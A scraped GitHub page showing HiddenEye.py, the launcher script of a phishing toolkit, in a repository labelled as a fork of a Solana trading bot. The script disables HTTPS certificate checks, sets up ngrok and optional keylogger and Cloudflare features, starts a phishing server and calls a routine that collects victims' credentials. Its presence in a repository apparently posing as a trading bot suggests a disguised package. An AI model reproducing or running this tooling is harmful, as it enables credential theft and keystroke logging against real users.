forked from hanshaze/solana-sniper-copy-mev-trading-bot
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathHiddenEye.py
More file actions
50 lines (41 loc) · 1.11 KB
/
Copy pathHiddenEye.py
File metadata and controls
50 lines (41 loc) · 1.11 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
#!/usr/bin/python3
#
#HiddenEye by Open Source Community
#
import multiprocessing
import gettext
from os import system,environ
import sys
import ssl
if(not environ.get('PYTHONHTTPSVERIFY',"") and getattr(ssl,'_create_unverified_context',None)):
ssl._create_default_https_context=ssl._create_unverified_context
from Defs.Checks import *
from Defs.Configurations import *
from Defs.Actions import *
from Defs.Languages import *
RED, WHITE, CYAN, GREEN, DEFAULT = '\033[91m', '\033[46m', '\033[36m', '\033[1;32m', '\033[0m'
checkPermissions()
installGetText()
languageSelector()
checkConnection()
checkNgrok()
ifSettingsNotExists()
readConfig()
if __name__ == "__main__":
try:
runMainMenu()
mainMenu()
keyloggerprompt()
addingkeylogger()
cloudfarePrompt()
addingCloudfare()
inputCustom()
port = selectPort()
##############
runServer(port)
selectServer(port)
multiprocessing.Process(target=runServer, args=(port,)).start()
getCredentials(port)
except KeyboardInterrupt:
endMessage()
exit(0)